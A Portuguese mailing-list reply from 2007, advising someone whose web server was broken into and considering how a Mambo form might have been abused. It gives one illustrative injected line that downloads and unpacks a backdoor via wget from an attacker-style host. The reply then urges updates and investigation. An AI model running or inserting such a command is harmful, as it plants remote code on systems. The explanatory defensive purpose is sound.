Re: Fui invadido - não sei o que mais fazer...

["Marcos Lazarini" <mvlaza@gmail.com>]

Em 03/05/07, Daniel<da_picon@yahoo.com.br> escreveu:
> Galera, me defrontei com um baita problema nessa volta de feriado...
>
> Ontem, verificando meu servidor de web, vi que tinha um usuário novo no
> bash.. aí fui ver os logs.. apagados.. resumindo: máquina invadida.
[...]

Bom, muitas coisas podem ter acontecido, e vou dar mais uma possibilidade:
em algum lugar que o mambo não projeta direito algum form e mande
direto o conteudo p/ uma query sql, o cara pode mandar assim:

busca por fulano de tal:

select * from users where nome=$variável

vira isso:

select 8 from users where nome="fulano de tal"; cd /tmp; mkdir .aa; cd
.aa; wget www.hakersz.ru/backdoor.gz; gunzip backdoor.gz ......

Ai basta vc estar usando qquer software desatualizado (kernel, em
especial) que o cara pode explorar e fazer a famosa escalada de
privilégio...

Ou seja, tem que fazer o update constantemente, de todos os softwares!
E essas coisas em PHP são sempre complicadas viu.... potencial de bugs
imenso.

Outra coisa: o ideal seria não sair formatando de cara.... seria legal
gastar um tempinho tentando descobrir o que é que aconteceu p/ que não
se repita.... mas nem sempre temos estrutura/tempo p/ fazer nossas
obrigações mais essas emergências que aparecem.

Veja tbm no histórico da lista, há várias outras dicas de casos
semelhantes ao seu.

Boa sorte.

--
Marcos